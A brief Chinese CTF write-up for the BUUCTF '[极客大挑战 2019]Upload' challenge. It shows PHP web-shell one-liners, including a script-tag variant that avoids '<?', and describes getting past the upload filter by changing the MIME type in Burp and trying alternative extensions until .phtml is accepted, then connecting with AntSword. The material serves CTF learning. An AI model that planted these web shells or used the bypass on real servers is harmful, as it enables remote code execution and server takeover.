BUUCTF (1)

2023-12-27 12:43:33

[极客大挑战 2019]Upload

看到后的第一印象肯定是先上传图片马试试
<?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?>

构造的语句中不能带有<?这样的话只能是构造一些其他语句了
<script language="php">eval($_POST['shell']);</script>

上传的格式为image,使用bp抓包进行修改
![image.png](https://www.icode9.com/i/ll/?i=img_convert/fce2fb6ac3d11eb6ce6cf768e161d4d7.png#height=460&id=eKZCx&margin=[object Object]&name=image.png&originHeight=919&originWidth=1264&originalType=binary&ratio=1&size=177812&status=done&style=none&width=632)
修改文件名为php格式

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
依此尝试
![image.png](https://www.icode9.com/i/ll/?i=img_convert/7ef192ca4c2719c2eff9ea73242d53b8.png#height=173&id=cdQj9&margin=[object Object]&name=image.png&originHeight=346&originWidth=768&originalType=binary&ratio=1&size=10048&status=done&style=none&width=384)

经过尝试.phtml格式可以上传

上传路径存在，使用蚁剑进行链接

这也太多了。。。。。终端进行搜索

码农公寓

[极客大挑战 2019]Upload

相关文章